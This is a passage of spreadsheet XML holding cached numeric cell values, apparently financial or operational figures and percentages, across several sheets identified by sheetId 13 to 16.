            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>402</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>350</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>3717.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>2278</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1600</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5534.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2590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4078.29</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>44.15</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>64</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>48.1370000000001</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>293.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>380</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3404.79</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>25293.96</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8918.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="13">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3394</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>33940.8199999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>16.25</v>
          </cell>
          <cell r="M6">
            <v>169</v>
          </cell>
          <cell r="N6">
            <v>4362.92</v>
          </cell>
          <cell r="O6">
            <v>67.7083333333333</v>
          </cell>
          <cell r="P6">
            <v>58.6805555555556</v>
          </cell>
          <cell r="Q6">
            <v>52.5399807321773</v>
          </cell>
          <cell r="R6">
            <v>81.2307692307692</v>
          </cell>
          <cell r="S6">
            <v>83.7810650887574</v>
          </cell>
          <cell r="T6">
            <v>86.0687337837962</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>10.5</v>
          </cell>
          <cell r="M7">
            <v>141.5</v>
          </cell>
          <cell r="N7">
            <v>4164.08</v>
          </cell>
          <cell r="O7">
            <v>43.75</v>
          </cell>
          <cell r="P7">
            <v>49.1319444444444</v>
          </cell>
          <cell r="Q7">
            <v>50.145472061657</v>
          </cell>
          <cell r="R7">
            <v>197.52380952381</v>
          </cell>
          <cell r="S7">
            <v>202.530035335689</v>
          </cell>
          <cell r="T7">
            <v>188.079719890108</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1320</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>600</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2946</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>151</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3597.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>200</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>1128.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>670</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>493</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>3894.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4534.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2074</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3666.13</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>43.14</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>91.277</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>282.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>365</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3018.63</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>25386.83</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8553.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="14">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>4772</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>34632.7499999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>16.25</v>
          </cell>
          <cell r="M6">
            <v>185.25</v>
          </cell>
          <cell r="N6">
            <v>4379.17</v>
          </cell>
          <cell r="O6">
            <v>67.7083333333333</v>
          </cell>
          <cell r="P6">
            <v>59.375</v>
          </cell>
          <cell r="Q6">
            <v>52.5836935638809</v>
          </cell>
          <cell r="R6">
            <v>82.8923076923077</v>
          </cell>
          <cell r="S6">
            <v>83.7031039136302</v>
          </cell>
          <cell r="T6">
            <v>86.0569468643601</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>16.25</v>
          </cell>
          <cell r="M7">
            <v>157.75</v>
          </cell>
          <cell r="N7">
            <v>4180.33</v>
          </cell>
          <cell r="O7">
            <v>67.7083333333333</v>
          </cell>
          <cell r="P7">
            <v>50.5608974358974</v>
          </cell>
          <cell r="Q7">
            <v>50.1960854947166</v>
          </cell>
          <cell r="R7">
            <v>210.769230769231</v>
          </cell>
          <cell r="S7">
            <v>203.378763866878</v>
          </cell>
          <cell r="T7">
            <v>188.167919757531</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1347</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>402</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>300</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>3048</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>402</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>500</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3499.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>170</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>958.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>1340</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>1066</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>4168.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>1608</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1400</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4742.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>3425</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4080.07</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>40.93</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>132.207</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>229</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>286</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3565.07</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>26364.76</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8267.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="15">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3299</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>33633.1899999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>16.25</v>
          </cell>
          <cell r="M6">
            <v>201.5</v>
          </cell>
          <cell r="N6">
            <v>4395.42</v>
          </cell>
          <cell r="O6">
            <v>67.7083333333333</v>
          </cell>
          <cell r="P6">
            <v>59.9702380952381</v>
          </cell>
          <cell r="Q6">
            <v>52.6271551724138</v>
          </cell>
          <cell r="R6">
            <v>86.5230769230769</v>
          </cell>
          <cell r="S6">
            <v>83.9305210918114</v>
          </cell>
          <cell r="T6">
            <v>86.0586701612133</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>9.75</v>
          </cell>
          <cell r="M7">
            <v>167.5</v>
          </cell>
          <cell r="N7">
            <v>4190.08</v>
          </cell>
          <cell r="O7">
            <v>40.625</v>
          </cell>
          <cell r="P7">
            <v>49.8511904761905</v>
          </cell>
          <cell r="Q7">
            <v>50.1685823754789</v>
          </cell>
          <cell r="R7">
            <v>194.153846153846</v>
          </cell>
          <cell r="S7">
            <v>202.841791044776</v>
          </cell>
          <cell r="T7">
            <v>188.181848556591</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1406</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>536</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>500</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>3084</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>335</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>412</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3422.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>1340</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>100</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>2198.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>500</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>3668.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>2278</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>863</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>6157.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>1893</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4298.56</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>86.86</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>66</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>153.067</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>333</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>314</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3651.56</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>25679.2</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>7953.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="16">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3560</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>33571.3699999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>8</v>
          </cell>
          <cell r="M6">
            <v>209.5</v>
          </cell>
          <cell r="N6">
            <v>4403.42</v>
          </cell>
          <cell r="O6">
            <v>33.3333333333333</v>
          </cell>
          <cell r="P6">
            <v>58.1944444444444</v>
          </cell>
          <cell r="Q6">
            <v>52.5718720152818</v>
          </cell>
          <cell r="R6">
            <v>83.875</v>
          </cell>
          <cell r="S6">
            <v>83.9284009546539</v>
          </cell>
          <cell r="T6">
            <v>86.0547029354456</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>15.25</v>
          </cell>
          <cell r="M7">
            <v>182.75</v>
          </cell>
          <cell r="N7">
            <v>4205.33</v>
          </cell>
          <cell r="O7">
            <v>63.5416666666667</v>
          </cell>
          <cell r="P7">
            <v>50.7638888888889</v>
          </cell>
          <cell r="Q7">
            <v>50.2069006685769</v>
          </cell>
          <cell r="R7">
            <v>189.44262295082</v>
          </cell>
          <cell r="S7">
            <v>201.72366621067</v>
          </cell>
          <cell r="T7">
            <v>188.186420566281</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>671</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>300</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2784</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>71</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3351.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>112</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>2086.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>1876</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>1000</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>4544.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1080</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5077.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2889</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3621.82</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>44.42</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>46</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>151.487</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>300.5</v>
          </cell>
        </row>
